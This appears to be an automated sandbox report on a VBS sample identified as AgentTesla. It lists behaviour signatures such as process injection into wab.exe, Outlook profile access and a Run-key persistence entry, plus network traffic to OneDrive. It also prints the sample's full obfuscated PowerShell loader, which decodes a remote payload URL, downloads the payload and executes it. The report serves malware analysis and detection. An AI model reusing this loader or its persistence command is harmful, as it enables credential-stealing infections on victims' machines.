Analysis Overview
SHA256
e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15
Threat Level: Known bad
The file e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-05 14:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 14:51
Reported
2024-06-05 14:53
Platform
win7-20240221-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2304 wrote to memory of 1404 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1404 wrote to memory of 2536 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$estlnderens = 1;Function Readaptive($Stavrimets){$Witumki=$Stavrimets.Length-$estlnderens;$Glasflasken='Substring';For( $Necker59=5;$Necker59 -lt $Witumki;$Necker59+=6){$Melby+=$Stavrimets.$Glasflasken.Invoke( $Necker59, $estlnderens);}$Melby;}function Disaccharidase($provinsernes){ & ($Onomantia) ($provinsernes);}$Arveflgerne=Readaptive ' TranMBr,dyoS.burzSy chi TypilA.sell JoeyaHuleb/ Ubje5 Isce.Til.r0Ledi, Patri(UtvunW,lstri rsken Pre d,mregoOverlwDemarsChole T afiNMorb TFire Der s1Soome0coupe. .ilr0s,nol; Afst Q,arWM,croi bnornFinde6Gyr.n4Kontr; Masc Brylx.reac6Frava4Beher;Q,arr Metamr Fre vAn.ir:D,rso1 Dyre2r bar1 Syne.Emanc0I,dor)Brdre TrkkGbars,eRootscKeystkCora.oInter/ bsol2 Will0 Call1Dipho0Otusa0There1Unimp0Prolo1Nedgr TorpeFDeratiCi,ilrK mmee Geigf Pe.ioPaafyx Scod/Samme1Cheec2Sands1Bae.t.Re en0,bere ';$Electronics=Readaptive 'PseudUS mbosDisemeAfprorJac,e- mnniAByldsgPeeviehegnenSansitHusdy ';$Dhamnoo=Readaptive 'C cath,rovktGavnbtP ivap ,unwsCa.or:Ensea/Ha.nt/Le emoOs,epnForbre Fab.dPre.nrOutseiCy,elv redeSla,i.PunchlFormpi LoxovArmbaeCasha.kachocHjemmo,askem Ther/ Re,idTi,geoScathw Ka,lnklagelOver o.nerkaOdorsdJobn.? Blemr Inc.eN,nexsGeisaiHierodFanta=Anfal7atrerE Re tBSesam6S nds7Incoe4demonA Po t8Primi8ForskC s amCSouteFAfst 3 Asb 8slask1RvestDBeskr%Gude.2,kibs1Forlo5W.rel5Senio6Baand&OprreaBaromu.napstMyrsih Stukk ,ersePiercy.entr=suive! RechA.ntvaEA.prvWLiset4Strst0ChemiNEm,rye U,dojAigu.ASjofe_HypernTalemSNoncrKQueenzMuscaMSvind ';$Mailability=Readaptive 'Fl rs>Doggi ';$Onomantia=Readaptive 'Stormi Subaebilerxforst ';$Richterskalas='Aarens';$Databaseadministrationens = Readaptive ' Helbe BryscOvermh arugo ,rod Tipsf%cur,aaApi rpTekstpSkamld.repaalsgretp euraDagv %Prin \ AlleV Bge,iPreutsBrnefiCopyctridseeBatc,eBe,ro2A,slu4Udb.d7Hitle..gsteBTarnioUlvinuincis balne&Aryan&Dioma PlageUnioncUnrejhCubatoTak.t non.xtM,leh ';Disaccharidase (Readaptive 'St.dw$M.lleg Baubl.nurpo OmstbKha gahatchlInfo.:St,lesFrthel Kbsty hasinAreoggN.nnae L,vel SejrsRedo tKl.nsu IceseVinter RefonKo.treThalasNotha=Doohi(MowracGenhrmDisesdGra d Lede/CentrcMycha ,ejlk$Best D ebraaCha ltDrgt.aRechebStrafaSubinsL zeleSt,ama retidToxifm En,oiFlambnP,rtiiFaares,egavtAffi,rBariea .ilit.tandiInteroB oadnTub,lePrem nEje dsSynoc) Lapp ');Disaccharidase (Readaptive 'H unc$S kkegFo.grl ViseoUdeb bCalifaN npolKomet:Raat.RMahogeTaabem RolloAnlgsust.urn NototTidersLinea9Sleev2B,ngt=Tyngs$U,dfoDCapsuhUdvi,aDe,mamberetnBitbro ablo tjer.Fordrs ,urep En.olrkke,irgfantAutot( Over$MandsMSuperaA,ungiDissol kulpaOvermbCoveriUntailFeliniDag,rtIndbiy agl)Stove ');$Dhamnoo=$Remounts92[0];$Sammenlimning= (Readaptive '.amme$IndelgP uvil Her.oFrndebForttaS.stelMuddl:ProgrCLab.ah .padlBrainoT,lefrBehinoVanddeHiventGiggehAnthreAksian Sa,feI eas=TalmoN ReeneTrac w.atho-pa,apOReshabFollijNestoeAukt,cOverkt O,er k ndeS SjlfydagpesRedigtKongeeS.kshmAfmil. Si,aNUnre,eAdelstSmaab.U.surWDisseeAdlegbI.gelCJordflDevoliConsceLa dgnRadiot');$Sammenlimning+=$slyngelstuernes[1];Disaccharidase ($Sammenlimning);Disaccharidase (Readaptive 'Super$ ,mmiCKommuhV ftelSo.geo UnderMisdioSammee TyndtBekldhOsteoe Aragn We.eeGatef.SkyttHDestiePl,kaa A,exdsatyreflirtrLong.s,ovor[Ves i$ UndeEHornflGage e Sp rc omapt Ki,krKretto BrnenBym,diVandicVa.utsSisa,] Nono=sj,ek$ N lgASmrepr RecavK,chse .begfEvindlSe.tig St reW,rkarInd anPietie Mean ');$sanseligstes=Readaptive 'Purom$ReducCT.skehSka,plRejeco Majur D spoudskeeNoaketDommeh predet llanStregeFo.ur.Dobb,DPestio.tundwHom tnOdenblIndheoRkvr aBedchdMine.FM,croiUnbibl.ayaweSongs(Savta$strsuDP.ddyhFo,uraSpecimPu,renLegeroagaupoNetka, Opp.$WhrimPHessiaNaturrEmbrocInc ueInseklOldsahIdioguInforsMinerg BotorStadeuKvalmnStud,dK.ordeErikknFermesDephl)Gg.re ';$Parcelhusgrundens=$slyngelstuernes[0];Disaccharidase (Readaptive ' Va.d$Kr,dsgSkraalAngolo pro bIndeta Regilbrill:Chi pSE,terkProt.runfloi.kratv SolfeBrydnsavan.t KithuUpdomeFo,skn .nte=Betak(CreamTgv ndeU.dersInfuntKlaps-SuperP ,orta TordtDis,eh Kies Udspr$SoftfPProfea aiterChlorcTimbee Spi lUnw.nhNuttiuFusumsBrummg.portrPlasmuAreopnOpslmdFluideN.tegn wingsEmbry)Solst ');while (!$Skrivestuen) {Disaccharidase (Readaptive 'Knall$ To.bgStdfalPaabyok ffebBin,caSphinlAn li: TopfBpar faKapact B staP,ehatShooteSkindnKussesClima= anif$Karantkva.irAfsteuSalgseMutt. ') ;Disaccharidase $sanseligstes;Disaccharidase (Readaptive ' .iteSAch ot .ommaSammerT rpetBlaar-SammeS R inl emaeOpskre EldrpRende vedta4 rve ');Disaccharidase (Readaptive 'Palae$Pest,gTheral Ichto epibBlokpaOver,lD lkr:VestvS .tilkStenbrPakv.iBevidvNewsaeSemiss Udfat SpecuEt,geeBulbynHydat=Belec( UrosTKvle e P,eis staatCirke-IndbePPhyllaOrdbetBri,ghCaffi Sup n$IltniP Emboajo.anrSun,mcPr.reeVarsllOg,hjhOzelou etrosUdgifgVrantrNoninuDr,jbnskibsdHelaueFlakonDemoisTopl.)Untwi ') ;Disaccharidase (Readaptive ' Ossi$SortbgSte.rlSkoleoS emabSkoleaCritilDsect:BrimmAFormidkommuop,tien,ateni TurnsNyvo,s Str eDumbsn Lrl slimfa= atob$Synchg SaddldatofoCons,bUncenalucimlD pra:CorruLKupeea DacrnHft pglankltKlasss orbrp ,isru tubenKeramdFlir.ePostdt Bole+Corru+ Atom%Marys$ZoonoRV rdee ,anymInvuloSmrbiuIntern S,ritCritisUrhn 9Pau e2Over,.ChampcMarciosocaguSkbn,nVi,lit B.fs ') ;$Dhamnoo=$Remounts92[$Adonissens];}$Statelier=288834;$Dykkeres=29520;Disaccharidase (Readaptive 'Rundt$StudigQuietlHidr.oTaa.mbKonfoaSkraal Mimi:PostgCD.riva JuritAquina TitrpDe.etu UnfrlOverdt squaeFrankdCopil Lon.o= Vol UdrikGDiapheMuckmtKonku-,ampeC BekeoBlommnDeputtHarp eCowernBlodgtTr ns Opna$H,poiPCritlaDro irOpre.cref,gepetrblAl.okhSem tuunnavsE inggde.esrG unduprizenS,perdGadsleGenesnCreepsHande ');Disaccharidase (Readaptive 'Hvilk$NahuagMi lilMora oRisikbAntiha Bat lForst:DigitPBadesiFlagrpGypsuetilstcGravioUnconlSejrvi Ove.nKogna1G str1 .hra9Stumb Lac.o= Tida Glos[koo dSKunstyTenses Holot T.ereIntonm Ubet.MorgnC Balko ogiknB xbav Eldee MisirAnnoyt Bere]U der: S xt:Rim,mFSk bsr,aataoLatermStemmBUdstua Midbs AleceTelef6s,ove4MatsaSRetort DacorClockiUnexpnBrodegSarko( Slip$ OrdsCknibeaHeppetWind aTradup N npuReturlFrilatLedsae Brusdelder) Bort ');Disaccharidase (Readaptive 'Udpla$LbegagTr del EuryoHewnobN,nnoa mitl,utke: epa,TF,rraaUnshop Ca rpAffaleQuantrStofhsUt,he O.gan=Simil B stt[ udplSHjligyEksposchimntChiloeForesmMenne.FdselTb.nene .ticxPeriotOilst.AescuE lyncnAssurcMatero Kir,dA,ioniaghasnTocy.gDi.te]Sorro: Sagg: J.ckATicklSShoelC MartINonigIO.stn.AvancG Up oeAmplitPr,kuSReofft K emrWheeli Yamun SidegV,lhe( V de$Subt PNebb,iRetrapRejsee Catoc ElevoBagholNitr.i LandnPigst1Cabal1R.del9Trach) D ac ');Disaccharidase (Readaptive 'detai$Gravfg Suttl,lansoPh.labIndjaaRinselC.tac:Hyp rTHal.kr UnloiRunesnEfterkHeinilAf ane Hypo=Valut$ Udr,T versaT lefp SamlpFondseBallorfrippsThesa. .aposPalatuOvaleb SeteswaukitFj rdrVal ki TurgnSubseg Prer(Sensu$ OverSBu.est.erroaEntobtanagueMannalEkspoiIndf eOr anrL,nin,Ordre$GinglDTegn.yFlledk traakSkilleForvrrAutoleMinibsDrgre)Lrem ');Disaccharidase $Trinkle;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visitee247.Bou && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
Files
memory/1404-4-0x000007FEF552E000-0x000007FEF552F000-memory.dmp
memory/1404-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/1404-6-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/1404-7-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-9-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-8-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-10-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-11-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-12-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
memory/1404-13-0x000007FEF552E000-0x000007FEF552F000-memory.dmp
memory/1404-14-0x000007FEF5270000-0x000007FEF5C0D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-05 14:51
Reported
2024-06-05 14:53
Platform
win10v2004-20240426-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Unevangelical191 = "%trianguleredes% -w 1 $multidivisional=(Get-ItemProperty -Path 'HKCU:\\Rematched\\').Cecidogenous;%trianguleredes% ($multidivisional)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2260 set thread context of 3972 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2eb2639ee439ad5cca4736f1cbc7eaf53871480cc92852ee6832b51c8e10b15.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$estlnderens = 1;Function Readaptive($Stavrimets){$Witumki=$Stavrimets.Length-$estlnderens;$Glasflasken='Substring';For( $Necker59=5;$Necker59 -lt $Witumki;$Necker59+=6){$Melby+=$Stavrimets.$Glasflasken.Invoke( $Necker59, $estlnderens);}$Melby;}function Disaccharidase($provinsernes){ & ($Onomantia) ($provinsernes);}$Arveflgerne=Readaptive ' TranMBr,dyoS.burzSy chi TypilA.sell JoeyaHuleb/ Ubje5 Isce.Til.r0Ledi, Patri(UtvunW,lstri rsken Pre d,mregoOverlwDemarsChole T afiNMorb TFire Der s1Soome0coupe. .ilr0s,nol; Afst Q,arWM,croi bnornFinde6Gyr.n4Kontr; Masc Brylx.reac6Frava4Beher;Q,arr Metamr Fre vAn.ir:D,rso1 Dyre2r bar1 Syne.Emanc0I,dor)Brdre TrkkGbars,eRootscKeystkCora.oInter/ bsol2 Will0 Call1Dipho0Otusa0There1Unimp0Prolo1Nedgr TorpeFDeratiCi,ilrK mmee Geigf Pe.ioPaafyx Scod/Samme1Cheec2Sands1Bae.t.Re en0,bere ';$Electronics=Readaptive 'PseudUS mbosDisemeAfprorJac,e- mnniAByldsgPeeviehegnenSansitHusdy ';$Dhamnoo=Readaptive 'C cath,rovktGavnbtP ivap ,unwsCa.or:Ensea/Ha.nt/Le emoOs,epnForbre Fab.dPre.nrOutseiCy,elv redeSla,i.PunchlFormpi LoxovArmbaeCasha.kachocHjemmo,askem Ther/ Re,idTi,geoScathw Ka,lnklagelOver o.nerkaOdorsdJobn.? Blemr Inc.eN,nexsGeisaiHierodFanta=Anfal7atrerE Re tBSesam6S nds7Incoe4demonA Po t8Primi8ForskC s amCSouteFAfst 3 Asb 8slask1RvestDBeskr%Gude.2,kibs1Forlo5W.rel5Senio6Baand&OprreaBaromu.napstMyrsih Stukk ,ersePiercy.entr=suive! RechA.ntvaEA.prvWLiset4Strst0ChemiNEm,rye U,dojAigu.ASjofe_HypernTalemSNoncrKQueenzMuscaMSvind ';$Mailability=Readaptive 'Fl rs>Doggi ';$Onomantia=Readaptive 'Stormi Subaebilerxforst ';$Richterskalas='Aarens';$Databaseadministrationens = Readaptive ' Helbe BryscOvermh arugo ,rod Tipsf%cur,aaApi rpTekstpSkamld.repaalsgretp euraDagv %Prin \ AlleV Bge,iPreutsBrnefiCopyctridseeBatc,eBe,ro2A,slu4Udb.d7Hitle..gsteBTarnioUlvinuincis balne&Aryan&Dioma PlageUnioncUnrejhCubatoTak.t non.xtM,leh ';Disaccharidase (Readaptive 'St.dw$M.lleg Baubl.nurpo OmstbKha gahatchlInfo.:St,lesFrthel Kbsty hasinAreoggN.nnae L,vel SejrsRedo tKl.nsu IceseVinter RefonKo.treThalasNotha=Doohi(MowracGenhrmDisesdGra d Lede/CentrcMycha ,ejlk$Best D ebraaCha ltDrgt.aRechebStrafaSubinsL zeleSt,ama retidToxifm En,oiFlambnP,rtiiFaares,egavtAffi,rBariea .ilit.tandiInteroB oadnTub,lePrem nEje dsSynoc) Lapp ');Disaccharidase (Readaptive 'H unc$S kkegFo.grl ViseoUdeb bCalifaN npolKomet:Raat.RMahogeTaabem RolloAnlgsust.urn NototTidersLinea9Sleev2B,ngt=Tyngs$U,dfoDCapsuhUdvi,aDe,mamberetnBitbro ablo tjer.Fordrs ,urep En.olrkke,irgfantAutot( Over$MandsMSuperaA,ungiDissol kulpaOvermbCoveriUntailFeliniDag,rtIndbiy agl)Stove ');$Dhamnoo=$Remounts92[0];$Sammenlimning= (Readaptive '.amme$IndelgP uvil Her.oFrndebForttaS.stelMuddl:ProgrCLab.ah .padlBrainoT,lefrBehinoVanddeHiventGiggehAnthreAksian Sa,feI eas=TalmoN ReeneTrac w.atho-pa,apOReshabFollijNestoeAukt,cOverkt O,er k ndeS SjlfydagpesRedigtKongeeS.kshmAfmil. Si,aNUnre,eAdelstSmaab.U.surWDisseeAdlegbI.gelCJordflDevoliConsceLa dgnRadiot');$Sammenlimning+=$slyngelstuernes[1];Disaccharidase ($Sammenlimning);Disaccharidase (Readaptive 'Super$ ,mmiCKommuhV ftelSo.geo UnderMisdioSammee TyndtBekldhOsteoe Aragn We.eeGatef.SkyttHDestiePl,kaa A,exdsatyreflirtrLong.s,ovor[Ves i$ UndeEHornflGage e Sp rc omapt Ki,krKretto BrnenBym,diVandicVa.utsSisa,] Nono=sj,ek$ N lgASmrepr RecavK,chse .begfEvindlSe.tig St reW,rkarInd anPietie Mean ');$sanseligstes=Readaptive 'Purom$ReducCT.skehSka,plRejeco Majur D spoudskeeNoaketDommeh predet llanStregeFo.ur.Dobb,DPestio.tundwHom tnOdenblIndheoRkvr aBedchdMine.FM,croiUnbibl.ayaweSongs(Savta$strsuDP.ddyhFo,uraSpecimPu,renLegeroagaupoNetka, Opp.$WhrimPHessiaNaturrEmbrocInc ueInseklOldsahIdioguInforsMinerg BotorStadeuKvalmnStud,dK.ordeErikknFermesDephl)Gg.re ';$Parcelhusgrundens=$slyngelstuernes[0];Disaccharidase (Readaptive ' Va.d$Kr,dsgSkraalAngolo pro bIndeta Regilbrill:Chi pSE,terkProt.runfloi.kratv SolfeBrydnsavan.t KithuUpdomeFo,skn .nte=Betak(CreamTgv ndeU.dersInfuntKlaps-SuperP ,orta TordtDis,eh Kies Udspr$SoftfPProfea aiterChlorcTimbee Spi lUnw.nhNuttiuFusumsBrummg.portrPlasmuAreopnOpslmdFluideN.tegn wingsEmbry)Solst ');while (!$Skrivestuen) {Disaccharidase (Readaptive 'Knall$ To.bgStdfalPaabyok ffebBin,caSphinlAn li: TopfBpar faKapact B staP,ehatShooteSkindnKussesClima= anif$Karantkva.irAfsteuSalgseMutt. ') ;Disaccharidase $sanseligstes;Disaccharidase (Readaptive ' .iteSAch ot .ommaSammerT rpetBlaar-SammeS R inl emaeOpskre EldrpRende vedta4 rve ');Disaccharidase (Readaptive 'Palae$Pest,gTheral Ichto epibBlokpaOver,lD lkr:VestvS .tilkStenbrPakv.iBevidvNewsaeSemiss Udfat SpecuEt,geeBulbynHydat=Belec( UrosTKvle e P,eis staatCirke-IndbePPhyllaOrdbetBri,ghCaffi Sup n$IltniP Emboajo.anrSun,mcPr.reeVarsllOg,hjhOzelou etrosUdgifgVrantrNoninuDr,jbnskibsdHelaueFlakonDemoisTopl.)Untwi ') ;Disaccharidase (Readaptive ' Ossi$SortbgSte.rlSkoleoS emabSkoleaCritilDsect:BrimmAFormidkommuop,tien,ateni TurnsNyvo,s Str eDumbsn Lrl slimfa= atob$Synchg SaddldatofoCons,bUncenalucimlD pra:CorruLKupeea DacrnHft pglankltKlasss orbrp ,isru tubenKeramdFlir.ePostdt Bole+Corru+ Atom%Marys$ZoonoRV rdee ,anymInvuloSmrbiuIntern S,ritCritisUrhn 9Pau e2Over,.ChampcMarciosocaguSkbn,nVi,lit B.fs ') ;$Dhamnoo=$Remounts92[$Adonissens];}$Statelier=288834;$Dykkeres=29520;Disaccharidase (Readaptive 'Rundt$StudigQuietlHidr.oTaa.mbKonfoaSkraal Mimi:PostgCD.riva JuritAquina TitrpDe.etu UnfrlOverdt squaeFrankdCopil Lon.o= Vol UdrikGDiapheMuckmtKonku-,ampeC BekeoBlommnDeputtHarp eCowernBlodgtTr ns Opna$H,poiPCritlaDro irOpre.cref,gepetrblAl.okhSem tuunnavsE inggde.esrG unduprizenS,perdGadsleGenesnCreepsHande ');Disaccharidase (Readaptive 'Hvilk$NahuagMi lilMora oRisikbAntiha Bat lForst:DigitPBadesiFlagrpGypsuetilstcGravioUnconlSejrvi Ove.nKogna1G str1 .hra9Stumb Lac.o= Tida Glos[koo dSKunstyTenses Holot T.ereIntonm Ubet.MorgnC Balko ogiknB xbav Eldee MisirAnnoyt Bere]U der: S xt:Rim,mFSk bsr,aataoLatermStemmBUdstua Midbs AleceTelef6s,ove4MatsaSRetort DacorClockiUnexpnBrodegSarko( Slip$ OrdsCknibeaHeppetWind aTradup N npuReturlFrilatLedsae Brusdelder) Bort ');Disaccharidase 